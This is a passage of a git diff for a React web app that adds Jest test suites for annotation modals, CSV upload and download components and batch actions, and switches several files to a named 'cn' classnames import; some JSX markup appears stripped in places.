userEvent.setup() + // Arrange + render() + + // Act + await openMenu(user) + await user.click(screen.getByText('common.operation.delete')) + await user.click(await screen.findByRole('button', { name: 'common.operation.confirm' })) + + // Assert + await waitFor(() => { + expect(mockDeleteDataset).toHaveBeenCalledWith('dataset-1') + }) + expect(mockInvalidDatasetList).toHaveBeenCalledTimes(1) + expect(mockReplace).toHaveBeenCalledWith('/datasets') + }) + }) +}) diff --git a/web/app/components/app-sidebar/dataset-info/index.tsx b/web/app/components/app-sidebar/dataset-info/index.tsx index 44b0baa72b..bace656d54 100644 --- a/web/app/components/app-sidebar/dataset-info/index.tsx +++ b/web/app/components/app-sidebar/dataset-info/index.tsx @@ -8,7 +8,7 @@ import { useDatasetDetailContextWithSelector } from '@/context/dataset-detail' import type { DataSet } from '@/models/datasets' import { DOC_FORM_TEXT } from '@/models/datasets' import { useKnowledge } from '@/hooks/use-knowledge' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Dropdown from './dropdown' type DatasetInfoProps = { diff --git a/web/app/components/app-sidebar/dataset-sidebar-dropdown.tsx b/web/app/components/app-sidebar/dataset-sidebar-dropdown.tsx index ac07333712..cf380d00d2 100644 --- a/web/app/components/app-sidebar/dataset-sidebar-dropdown.tsx +++ b/web/app/components/app-sidebar/dataset-sidebar-dropdown.tsx @@ -11,7 +11,7 @@ import AppIcon from '../base/app-icon' import Divider from '../base/divider' import NavLink from './navLink' import type { NavIcon } from './navLink' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useDatasetDetailContextWithSelector } from '@/context/dataset-detail' import Effect from '../base/effect' import Dropdown from './dataset-info/dropdown' diff --git a/web/app/components/app-sidebar/index.tsx b/web/app/components/app-sidebar/index.tsx index 86de2e2034..fe52c4cfa2 100644 --- 
a/web/app/components/app-sidebar/index.tsx +++ b/web/app/components/app-sidebar/index.tsx @@ -9,7 +9,7 @@ import AppSidebarDropdown from './app-sidebar-dropdown' import useBreakpoints, { MediaType } from '@/hooks/use-breakpoints' import { useStore as useAppStore } from '@/app/components/app/store' import { useEventEmitterContextContext } from '@/context/event-emitter' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Divider from '../base/divider' import { useHover, useKeyPress } from 'ahooks' import ToggleButton from './toggle-button' diff --git a/web/app/components/app-sidebar/navLink.tsx b/web/app/components/app-sidebar/navLink.tsx index ad90b91250..f6d8e57682 100644 --- a/web/app/components/app-sidebar/navLink.tsx +++ b/web/app/components/app-sidebar/navLink.tsx @@ -2,7 +2,7 @@ import React from 'react' import { useSelectedLayoutSegment } from 'next/navigation' import Link from 'next/link' -import classNames from '@/utils/classnames' +import { cn } from '@/utils/classnames' import type { RemixiconComponentType } from '@remixicon/react' export type NavIcon = React.ComponentType< @@ -42,7 +42,7 @@ const NavLink = ({ const NavIcon = isActive ? iconMap.selected : iconMap.normal const renderIcon = () => ( -
+
) @@ -53,21 +53,17 @@ const NavLink = ({ key={name} type='button' disabled - className={classNames( - 'system-sm-medium flex h-8 cursor-not-allowed items-center rounded-lg text-components-menu-item-text opacity-30 hover:bg-components-menu-item-bg-hover', - 'pl-3 pr-1', - )} + className={cn('system-sm-medium flex h-8 cursor-not-allowed items-center rounded-lg text-components-menu-item-text opacity-30 hover:bg-components-menu-item-bg-hover', + 'pl-3 pr-1')} title={mode === 'collapse' ? name : ''} aria-disabled > {renderIcon()} {name} @@ -79,22 +75,18 @@ const NavLink = ({ {renderIcon()} {name} diff --git a/web/app/components/app-sidebar/toggle-button.tsx b/web/app/components/app-sidebar/toggle-button.tsx index 8de6f887f6..4f69adfc34 100644 --- a/web/app/components/app-sidebar/toggle-button.tsx +++ b/web/app/components/app-sidebar/toggle-button.tsx @@ -1,7 +1,7 @@ import React from 'react' import Button from '../base/button' import { RiArrowLeftSLine, RiArrowRightSLine } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Tooltip from '../base/tooltip' import { useTranslation } from 'react-i18next' import { getKeyboardKeyNameBySystem } from '../workflow/utils' diff --git a/web/app/components/app/annotation/add-annotation-modal/edit-item/index.spec.tsx b/web/app/components/app/annotation/add-annotation-modal/edit-item/index.spec.tsx new file mode 100644 index 0000000000..f226adf22b --- /dev/null +++ b/web/app/components/app/annotation/add-annotation-modal/edit-item/index.spec.tsx @@ -0,0 +1,47 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import EditItem, { EditItemType } from './index' + +describe('AddAnnotationModal/EditItem', () => { + test('should render query inputs with user avatar and placeholder strings', () => { + render( + , + ) + + expect(screen.getByText('appAnnotation.addModal.queryName')).toBeInTheDocument() + 
expect(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder')).toBeInTheDocument() + expect(screen.getByText('Why?')).toBeInTheDocument() + }) + + test('should render answer name and placeholder text', () => { + render( + , + ) + + expect(screen.getByText('appAnnotation.addModal.answerName')).toBeInTheDocument() + expect(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder')).toBeInTheDocument() + expect(screen.getByDisplayValue('Existing answer')).toBeInTheDocument() + }) + + test('should propagate changes when answer content updates', () => { + const handleChange = jest.fn() + render( + , + ) + + fireEvent.change(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder'), { target: { value: 'Because' } }) + expect(handleChange).toHaveBeenCalledWith('Because') + }) +}) diff --git a/web/app/components/app/annotation/add-annotation-modal/index.spec.tsx b/web/app/components/app/annotation/add-annotation-modal/index.spec.tsx new file mode 100644 index 0000000000..3103e3c96d --- /dev/null +++ b/web/app/components/app/annotation/add-annotation-modal/index.spec.tsx @@ -0,0 +1,155 @@ +import React from 'react' +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react' +import AddAnnotationModal from './index' +import { useProviderContext } from '@/context/provider-context' + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: jest.fn(), +})) + +const mockToastNotify = jest.fn() +jest.mock('@/app/components/base/toast', () => ({ + __esModule: true, + default: { + notify: jest.fn(args => mockToastNotify(args)), + }, +})) + +jest.mock('@/app/components/billing/annotation-full', () => () =>
) + +const mockUseProviderContext = useProviderContext as jest.Mock + +const getProviderContext = ({ usage = 0, total = 10, enableBilling = false } = {}) => ({ + plan: { + usage: { annotatedResponse: usage }, + total: { annotatedResponse: total }, + }, + enableBilling, +}) + +describe('AddAnnotationModal', () => { + const baseProps = { + isShow: true, + onHide: jest.fn(), + onAdd: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + mockUseProviderContext.mockReturnValue(getProviderContext()) + }) + + const typeQuestion = (value: string) => { + fireEvent.change(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder'), { + target: { value }, + }) + } + + const typeAnswer = (value: string) => { + fireEvent.change(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder'), { + target: { value }, + }) + } + + test('should render modal title when drawer is visible', () => { + render() + + expect(screen.getByText('appAnnotation.addModal.title')).toBeInTheDocument() + }) + + test('should capture query input text when typing', () => { + render() + typeQuestion('Sample question') + expect(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder')).toHaveValue('Sample question') + }) + + test('should capture answer input text when typing', () => { + render() + typeAnswer('Sample answer') + expect(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder')).toHaveValue('Sample answer') + }) + + test('should show annotation full notice and disable submit when quota exceeded', () => { + mockUseProviderContext.mockReturnValue(getProviderContext({ usage: 10, total: 10, enableBilling: true })) + render() + + expect(screen.getByTestId('annotation-full')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.add' })).toBeDisabled() + }) + + test('should call onAdd with form values when create next enabled', async () => { + const onAdd = jest.fn().mockResolvedValue(undefined) + render() + + 
typeQuestion('Question value') + typeAnswer('Answer value') + fireEvent.click(screen.getByTestId('checkbox-create-next-checkbox')) + + await act(async () => { + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + }) + + expect(onAdd).toHaveBeenCalledWith({ question: 'Question value', answer: 'Answer value' }) + }) + + test('should reset fields after saving when create next enabled', async () => { + const onAdd = jest.fn().mockResolvedValue(undefined) + render() + + typeQuestion('Question value') + typeAnswer('Answer value') + const createNextToggle = screen.getByText('appAnnotation.addModal.createNext').previousElementSibling as HTMLElement + fireEvent.click(createNextToggle) + + await act(async () => { + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + }) + + await waitFor(() => { + expect(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder')).toHaveValue('') + expect(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder')).toHaveValue('') + }) + }) + + test('should show toast when validation fails for missing question', () => { + render() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + expect(mockToastNotify).toHaveBeenCalledWith(expect.objectContaining({ + type: 'error', + message: 'appAnnotation.errorMessage.queryRequired', + })) + }) + + test('should show toast when validation fails for missing answer', () => { + render() + typeQuestion('Filled question') + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + + expect(mockToastNotify).toHaveBeenCalledWith(expect.objectContaining({ + type: 'error', + message: 'appAnnotation.errorMessage.answerRequired', + })) + }) + + test('should close modal when save completes and create next unchecked', async () => { + const onAdd = jest.fn().mockResolvedValue(undefined) + render() + + typeQuestion('Q') + typeAnswer('A') + + await act(async () => { + 
fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + }) + + expect(baseProps.onHide).toHaveBeenCalled() + }) + + test('should allow cancel button to close the drawer', () => { + render() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.cancel' })) + expect(baseProps.onHide).toHaveBeenCalled() + }) +}) diff --git a/web/app/components/app/annotation/add-annotation-modal/index.tsx b/web/app/components/app/annotation/add-annotation-modal/index.tsx index 274a57adf1..0ae4439531 100644 --- a/web/app/components/app/annotation/add-annotation-modal/index.tsx +++ b/web/app/components/app/annotation/add-annotation-modal/index.tsx @@ -101,7 +101,7 @@ const AddAnnotationModal: FC = ({
- setIsCreateNext(!isCreateNext)} /> + setIsCreateNext(!isCreateNext)} />
{t('appAnnotation.addModal.createNext')}
diff --git a/web/app/components/app/annotation/batch-action.spec.tsx b/web/app/components/app/annotation/batch-action.spec.tsx new file mode 100644 index 0000000000..36440fc044 --- /dev/null +++ b/web/app/components/app/annotation/batch-action.spec.tsx @@ -0,0 +1,42 @@ +import React from 'react' +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react' +import BatchAction from './batch-action' + +describe('BatchAction', () => { + const baseProps = { + selectedIds: ['1', '2', '3'], + onBatchDelete: jest.fn(), + onCancel: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + it('should show the selected count and trigger cancel action', () => { + render() + + expect(screen.getByText('3')).toBeInTheDocument() + expect(screen.getByText('appAnnotation.batchAction.selected')).toBeInTheDocument() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.cancel' })) + + expect(baseProps.onCancel).toHaveBeenCalledTimes(1) + }) + + it('should confirm before running batch delete', async () => { + const onBatchDelete = jest.fn().mockResolvedValue(undefined) + render() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.delete' })) + await screen.findByText('appAnnotation.list.delete.title') + + await act(async () => { + fireEvent.click(screen.getAllByRole('button', { name: 'common.operation.delete' })[1]) + }) + + await waitFor(() => { + expect(onBatchDelete).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/app/annotation/batch-action.tsx b/web/app/components/app/annotation/batch-action.tsx index 6e80d0c4c8..6ff392d17e 100644 --- a/web/app/components/app/annotation/batch-action.tsx +++ b/web/app/components/app/annotation/batch-action.tsx @@ -3,7 +3,7 @@ import { RiDeleteBinLine } from '@remixicon/react' import { useTranslation } from 'react-i18next' import { useBoolean } from 'ahooks' import Divider from '@/app/components/base/divider' -import classNames from '@/utils/classnames' 
+import { cn } from '@/utils/classnames' import Confirm from '@/app/components/base/confirm' const i18nPrefix = 'appAnnotation.batchAction' @@ -38,7 +38,7 @@ const BatchAction: FC = ({ setIsNotDeleting() } return ( -
+
diff --git a/web/app/components/app/annotation/batch-add-annotation-modal/csv-downloader.spec.tsx b/web/app/components/app/annotation/batch-add-annotation-modal/csv-downloader.spec.tsx new file mode 100644 index 0000000000..7d360cfc1b --- /dev/null +++ b/web/app/components/app/annotation/batch-add-annotation-modal/csv-downloader.spec.tsx @@ -0,0 +1,72 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import CSVDownload from './csv-downloader' +import I18nContext from '@/context/i18n' +import { LanguagesSupported } from '@/i18n-config/language' +import type { Locale } from '@/i18n-config' + +const downloaderProps: any[] = [] + +jest.mock('react-papaparse', () => ({ + useCSVDownloader: jest.fn(() => ({ + CSVDownloader: ({ children, ...props }: any) => { + downloaderProps.push(props) + return
{children}
+ }, + Type: { Link: 'link' }, + })), +})) + +const renderWithLocale = (locale: Locale) => { + return render( + + + , + ) +} + +describe('CSVDownload', () => { + const englishTemplate = [ + ['question', 'answer'], + ['question1', 'answer1'], + ['question2', 'answer2'], + ] + const chineseTemplate = [ + ['问题', '答案'], + ['问题 1', '答案 1'], + ['问题 2', '答案 2'], + ] + + beforeEach(() => { + downloaderProps.length = 0 + }) + + it('should render the structure preview and pass English template data by default', () => { + renderWithLocale('en-US' as Locale) + + expect(screen.getByText('share.generation.csvStructureTitle')).toBeInTheDocument() + expect(screen.getByText('appAnnotation.batchModal.template')).toBeInTheDocument() + + expect(downloaderProps[0]).toMatchObject({ + filename: 'template-en-US', + type: 'link', + bom: true, + data: englishTemplate, + }) + }) + + it('should switch to the Chinese template when locale matches the secondary language', () => { + const locale = LanguagesSupported[1] as Locale + renderWithLocale(locale) + + expect(downloaderProps[0]).toMatchObject({ + filename: `template-${locale}`, + data: chineseTemplate, + }) + }) +}) diff --git a/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.spec.tsx b/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.spec.tsx new file mode 100644 index 0000000000..d94295c31c --- /dev/null +++ b/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.spec.tsx @@ -0,0 +1,115 @@ +import React from 'react' +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import CSVUploader, { type Props } from './csv-uploader' +import { ToastContext } from '@/app/components/base/toast' + +describe('CSVUploader', () => { + const notify = jest.fn() + const updateFile = jest.fn() + + const getDropElements = () => { + const title = screen.getByText('appAnnotation.batchModal.csvUploadTitle') + const dropZone = title.parentElement?.parentElement as 
HTMLDivElement | null + if (!dropZone || !dropZone.parentElement) + throw new Error('Drop zone not found') + const dropContainer = dropZone.parentElement as HTMLDivElement + return { dropZone, dropContainer } + } + + const renderComponent = (props?: Partial) => { + const mergedProps: Props = { + file: undefined, + updateFile, + ...props, + } + return render( + + + , + ) + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + it('should open the file picker when clicking browse', () => { + const clickSpy = jest.spyOn(HTMLInputElement.prototype, 'click') + renderComponent() + + fireEvent.click(screen.getByText('appAnnotation.batchModal.browse')) + + expect(clickSpy).toHaveBeenCalledTimes(1) + clickSpy.mockRestore() + }) + + it('should toggle dragging styles and upload the dropped file', async () => { + const file = new File(['content'], 'input.csv', { type: 'text/csv' }) + renderComponent() + const { dropZone, dropContainer } = getDropElements() + + fireEvent.dragEnter(dropContainer) + expect(dropZone.className).toContain('border-components-dropzone-border-accent') + expect(dropZone.className).toContain('bg-components-dropzone-bg-accent') + + fireEvent.drop(dropContainer, { dataTransfer: { files: [file] } }) + + await waitFor(() => expect(updateFile).toHaveBeenCalledWith(file)) + expect(dropZone.className).not.toContain('border-components-dropzone-border-accent') + }) + + it('should ignore drop events without dataTransfer', () => { + renderComponent() + const { dropContainer } = getDropElements() + + fireEvent.drop(dropContainer) + + expect(updateFile).not.toHaveBeenCalled() + }) + + it('should show an error when multiple files are dropped', async () => { + const fileA = new File(['a'], 'a.csv', { type: 'text/csv' }) + const fileB = new File(['b'], 'b.csv', { type: 'text/csv' }) + renderComponent() + const { dropContainer } = getDropElements() + + fireEvent.drop(dropContainer, { dataTransfer: { files: [fileA, fileB] } }) + + await waitFor(() => 
expect(notify).toHaveBeenCalledWith({ + type: 'error', + message: 'datasetCreation.stepOne.uploader.validation.count', + })) + expect(updateFile).not.toHaveBeenCalled() + }) + + it('should propagate file selection changes through input change event', () => { + const file = new File(['row'], 'selected.csv', { type: 'text/csv' }) + const { container } = renderComponent() + const fileInput = container.querySelector('input[type="file"]') as HTMLInputElement + + fireEvent.change(fileInput, { target: { files: [file] } }) + + expect(updateFile).toHaveBeenCalledWith(file) + }) + + it('should render selected file details and allow change/removal', () => { + const file = new File(['data'], 'report.csv', { type: 'text/csv' }) + const { container } = renderComponent({ file }) + const fileInput = container.querySelector('input[type="file"]') as HTMLInputElement + + expect(screen.getByText('report')).toBeInTheDocument() + expect(screen.getByText('.csv')).toBeInTheDocument() + + const clickSpy = jest.spyOn(HTMLInputElement.prototype, 'click') + fireEvent.click(screen.getByText('datasetCreation.stepOne.uploader.change')) + expect(clickSpy).toHaveBeenCalled() + clickSpy.mockRestore() + + const valueSetter = jest.spyOn(fileInput, 'value', 'set') + const removeTrigger = screen.getByTestId('remove-file-button') + fireEvent.click(removeTrigger) + + expect(updateFile).toHaveBeenCalledWith() + expect(valueSetter).toHaveBeenCalledWith('') + }) +}) diff --git a/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.tsx b/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.tsx index b98eb815f9..c9766135df 100644 --- a/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.tsx +++ b/web/app/components/app/annotation/batch-add-annotation-modal/csv-uploader.tsx @@ -4,7 +4,7 @@ import React, { useEffect, useRef, useState } from 'react' import { useTranslation } from 'react-i18next' import { useContext } from 'use-context-selector' 
import { RiDeleteBinLine } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { Csv as CSVIcon } from '@/app/components/base/icons/src/public/files' import { ToastContext } from '@/app/components/base/toast' import Button from '@/app/components/base/button' @@ -114,7 +114,7 @@ const CSVUploader: FC = ({
-
+
diff --git a/web/app/components/app/annotation/batch-add-annotation-modal/index.spec.tsx b/web/app/components/app/annotation/batch-add-annotation-modal/index.spec.tsx new file mode 100644 index 0000000000..5527340895 --- /dev/null +++ b/web/app/components/app/annotation/batch-add-annotation-modal/index.spec.tsx @@ -0,0 +1,164 @@ +import React from 'react' +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react' +import BatchModal, { ProcessStatus } from './index' +import { useProviderContext } from '@/context/provider-context' +import { annotationBatchImport, checkAnnotationBatchImportProgress } from '@/service/annotation' +import type { IBatchModalProps } from './index' +import Toast from '@/app/components/base/toast' + +jest.mock('@/app/components/base/toast', () => ({ + __esModule: true, + default: { + notify: jest.fn(), + }, +})) + +jest.mock('@/service/annotation', () => ({ + annotationBatchImport: jest.fn(), + checkAnnotationBatchImportProgress: jest.fn(), +})) + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: jest.fn(), +})) + +jest.mock('./csv-downloader', () => ({ + __esModule: true, + default: () =>
, +})) + +let lastUploadedFile: File | undefined + +jest.mock('./csv-uploader', () => ({ + __esModule: true, + default: ({ file, updateFile }: { file?: File; updateFile: (file?: File) => void }) => ( +
+ + {file && {file.name}} +
+ ), +})) + +jest.mock('@/app/components/billing/annotation-full', () => ({ + __esModule: true, + default: () =>
, +})) + +const mockNotify = Toast.notify as jest.Mock +const useProviderContextMock = useProviderContext as jest.Mock +const annotationBatchImportMock = annotationBatchImport as jest.Mock +const checkAnnotationBatchImportProgressMock = checkAnnotationBatchImportProgress as jest.Mock + +const renderComponent = (props: Partial = {}) => { + const mergedProps: IBatchModalProps = { + appId: 'app-id', + isShow: true, + onCancel: jest.fn(), + onAdded: jest.fn(), + ...props, + } + return { + ...render(), + props: mergedProps, + } +} + +describe('BatchModal', () => { + beforeEach(() => { + jest.clearAllMocks() + lastUploadedFile = undefined + useProviderContextMock.mockReturnValue({ + plan: { + usage: { annotatedResponse: 0 }, + total: { annotatedResponse: 10 }, + }, + enableBilling: false, + }) + }) + + it('should disable run action and show billing hint when annotation quota is full', () => { + useProviderContextMock.mockReturnValue({ + plan: { + usage: { annotatedResponse: 10 }, + total: { annotatedResponse: 10 }, + }, + enableBilling: true, + }) + + renderComponent() + + expect(screen.getByTestId('annotation-full')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'appAnnotation.batchModal.run' })).toBeDisabled() + }) + + it('should reset uploader state when modal closes and allow manual cancellation', () => { + const { rerender, props } = renderComponent() + + fireEvent.click(screen.getByTestId('mock-uploader')) + expect(screen.getByTestId('selected-file')).toHaveTextContent('batch.csv') + + rerender() + rerender() + + expect(screen.queryByTestId('selected-file')).toBeNull() + + fireEvent.click(screen.getByRole('button', { name: 'appAnnotation.batchModal.cancel' })) + expect(props.onCancel).toHaveBeenCalledTimes(1) + }) + + it('should submit the csv file, poll status, and notify when import completes', async () => { + jest.useFakeTimers() + const { props } = renderComponent() + const fileTrigger = screen.getByTestId('mock-uploader') + 
fireEvent.click(fileTrigger) + + const runButton = screen.getByRole('button', { name: 'appAnnotation.batchModal.run' }) + expect(runButton).not.toBeDisabled() + + annotationBatchImportMock.mockResolvedValue({ job_id: 'job-1', job_status: ProcessStatus.PROCESSING }) + checkAnnotationBatchImportProgressMock + .mockResolvedValueOnce({ job_id: 'job-1', job_status: ProcessStatus.PROCESSING }) + .mockResolvedValueOnce({ job_id: 'job-1', job_status: ProcessStatus.COMPLETED }) + + await act(async () => { + fireEvent.click(runButton) + }) + + await waitFor(() => { + expect(annotationBatchImportMock).toHaveBeenCalledTimes(1) + }) + + const formData = annotationBatchImportMock.mock.calls[0][0].body as FormData + expect(formData.get('file')).toBe(lastUploadedFile) + + await waitFor(() => { + expect(checkAnnotationBatchImportProgressMock).toHaveBeenCalledTimes(1) + }) + + await act(async () => { + jest.runOnlyPendingTimers() + }) + + await waitFor(() => { + expect(checkAnnotationBatchImportProgressMock).toHaveBeenCalledTimes(2) + }) + + await waitFor(() => { + expect(mockNotify).toHaveBeenCalledWith({ + type: 'success', + message: 'appAnnotation.batchModal.completed', + }) + expect(props.onAdded).toHaveBeenCalledTimes(1) + expect(props.onCancel).toHaveBeenCalledTimes(1) + }) + jest.useRealTimers() + }) +}) diff --git a/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx b/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx new file mode 100644 index 0000000000..fd6d900aa4 --- /dev/null +++ b/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx @@ -0,0 +1,98 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import ClearAllAnnotationsConfirmModal from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => { + const translations: Record = { + 'appAnnotation.table.header.clearAllConfirm': 'Clear 
all annotations?', + 'common.operation.confirm': 'Confirm', + 'common.operation.cancel': 'Cancel', + } + return translations[key] || key + }, + }), +})) + +beforeEach(() => { + jest.clearAllMocks() +}) + +describe('ClearAllAnnotationsConfirmModal', () => { + // Rendering visibility toggled by isShow flag + describe('Rendering', () => { + test('should show confirmation dialog when isShow is true', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.getByText('Clear all annotations?')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Cancel' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Confirm' })).toBeInTheDocument() + }) + + test('should not render anything when isShow is false', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.queryByText('Clear all annotations?')).not.toBeInTheDocument() + }) + }) + + // User confirms or cancels clearing annotations + describe('Interactions', () => { + test('should trigger onHide when cancel is clicked', () => { + const onHide = jest.fn() + const onConfirm = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Cancel' })) + + // Assert + expect(onHide).toHaveBeenCalledTimes(1) + expect(onConfirm).not.toHaveBeenCalled() + }) + + test('should trigger onConfirm when confirm is clicked', () => { + const onHide = jest.fn() + const onConfirm = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Confirm' })) + + // Assert + expect(onConfirm).toHaveBeenCalledTimes(1) + expect(onHide).not.toHaveBeenCalled() + }) + }) +}) diff --git a/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.spec.tsx b/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.spec.tsx new file mode 100644 index 0000000000..95a5586292 --- /dev/null +++ b/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.spec.tsx @@ -0,0 +1,466 
@@ +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import EditItem, { EditItemType, EditTitle } from './index' + +describe('EditTitle', () => { + it('should render title content correctly', () => { + // Arrange + const props = { title: 'Test Title' } + + // Act + render() + + // Assert + expect(screen.getByText(/test title/i)).toBeInTheDocument() + // Should contain edit icon (svg element) + expect(document.querySelector('svg')).toBeInTheDocument() + }) + + it('should apply custom className when provided', () => { + // Arrange + const props = { + title: 'Test Title', + className: 'custom-class', + } + + // Act + const { container } = render() + + // Assert + expect(screen.getByText(/test title/i)).toBeInTheDocument() + expect(container.querySelector('.custom-class')).toBeInTheDocument() + }) +}) + +describe('EditItem', () => { + const defaultProps = { + type: EditItemType.Query, + content: 'Test content', + onSave: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render content correctly', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + expect(screen.getByText(/test content/i)).toBeInTheDocument() + // Should show item name (query or answer) + expect(screen.getByText('appAnnotation.editModal.queryName')).toBeInTheDocument() + }) + + it('should render different item types correctly', () => { + // Arrange + const props = { + ...defaultProps, + type: EditItemType.Answer, + content: 'Answer content', + } + + // Act + render() + + // Assert + expect(screen.getByText(/answer content/i)).toBeInTheDocument() + expect(screen.getByText('appAnnotation.editModal.answerName')).toBeInTheDocument() + }) + + it('should show edit controls when not readonly', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + 
expect(screen.getByText('common.operation.edit')).toBeInTheDocument() + }) + + it('should hide edit controls when readonly', () => { + // Arrange + const props = { + ...defaultProps, + readonly: true, + } + + // Act + render() + + // Assert + expect(screen.queryByText('common.operation.edit')).not.toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should respect readonly prop for edit functionality', () => { + // Arrange + const props = { + ...defaultProps, + readonly: true, + } + + // Act + render() + + // Assert + expect(screen.getByText(/test content/i)).toBeInTheDocument() + expect(screen.queryByText('common.operation.edit')).not.toBeInTheDocument() + }) + + it('should display provided content', () => { + // Arrange + const props = { + ...defaultProps, + content: 'Custom content for testing', + } + + // Act + render() + + // Assert + expect(screen.getByText(/custom content for testing/i)).toBeInTheDocument() + }) + + it('should render appropriate content based on type', () => { + // Arrange + const props = { + ...defaultProps, + type: EditItemType.Query, + content: 'Question content', + } + + // Act + render() + + // Assert + expect(screen.getByText(/question content/i)).toBeInTheDocument() + expect(screen.getByText('appAnnotation.editModal.queryName')).toBeInTheDocument() + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should activate edit mode when edit button is clicked', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + // Assert + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.cancel' })).toBeInTheDocument() + }) + + it('should save new content when save button is clicked', async () => { + 
// Arrange + const mockSave = jest.fn().mockResolvedValue(undefined) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + // Type new content + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Updated content') + + // Save + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert + expect(mockSave).toHaveBeenCalledWith('Updated content') + }) + + it('should exit edit mode when cancel button is clicked', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + await user.click(screen.getByRole('button', { name: 'common.operation.cancel' })) + + // Assert + expect(screen.queryByRole('textbox')).not.toBeInTheDocument() + expect(screen.getByText(/test content/i)).toBeInTheDocument() + }) + + it('should show content preview while typing', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + const textarea = screen.getByRole('textbox') + await user.type(textarea, 'New content') + + // Assert + expect(screen.getByText(/new content/i)).toBeInTheDocument() + }) + + it('should call onSave with correct content when saving', async () => { + // Arrange + const mockSave = jest.fn().mockResolvedValue(undefined) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Test save content') + + // Save + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // 
